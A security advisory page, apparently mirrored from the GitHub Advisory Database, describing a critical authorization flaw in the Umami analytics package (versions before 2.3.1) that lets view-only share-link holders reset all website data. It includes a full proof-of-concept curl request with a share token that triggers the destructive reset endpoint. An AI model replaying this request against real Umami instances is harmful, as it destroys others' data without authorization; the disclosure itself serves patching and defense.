Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS04d3d3LWNmZmgtNHE5OM4AA08I

Anyone with a share link can RESET all website data in Umami

Summary

Anyone with a share link (permissions to view) can reset the website data.

Details

When a user navigates to a /share/ URL, he receives a share token which is used for authentication. This token is later verified by useAuth. After the token is verified, the user can call most of the GET APIs that allow fetching stats about a website.

The POST /reset endpoint is secured using canViewWebsite which is the incorrect verification for such destructive action. This makes it possible to completly reset all website data ONLY with view permissions - permalink

PoC

curl -X POST 'https://analytics.umami.is/api/websites/b8250618-ccb5-47fb-8350-31c96169a198/reset' \
  -H 'authority: analytics.umami.is' \
  -H 'accept: application/json' \
  -H 'accept-language: en-US,en;q=0.9' \
  -H 'authorization: Bearer undefined' \
  -H 'cache-control: no-cache' \
  -H 'content-type: application/json' \
  -H 'pragma: no-cache' \
  -H 'referer: https://analytics.umami.is/share/bw6MFhkwpwEXFsbd/test' \
  -H 'sec-ch-ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "Linux"' \
  -H 'sec-fetch-dest: empty' \
  -H 'sec-fetch-mode: cors' \
  -H 'sec-fetch-site: same-origin' \
  -H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36' \
  -H 'x-umami-share-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ3ZWJzaXRlSWQiOiJiODI1MDYxOC1jY2I1LTQ3ZmItODM1MC0zMWM5NjE2OWExOTgiLCJpYXQiOjE2OTAzNjkxOTl9.zTfwFrfggE5na7rOOgkUobEBm48AH_8WVyh2RgJGzcw' \
  --compressed

You can reproduce this by:

Impact

Everyone with an open share link exposed to the internet!

Permalink: https://github.com/advisories/GHSA-8www-cffh-4q98
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04d3d3LWNmZmgtNHE5OM4AA08I
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: over 1 year ago
Updated: over 1 year ago


CVSS Score: 9.6
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H

Identifiers: GHSA-8www-cffh-4q98
References: Repository: https://github.com/umami-software/umami
Blast Radius: 0.0

Affected Packages

npm:umami
Dependent packages: 1
Dependent repositories: 1
Downloads: 195 last month
Affected Version Ranges: < 2.3.1
Fixed in: 2.3.1
All affected versions: 0.0.0, 0.1.0
All unaffected versions: 2.10.0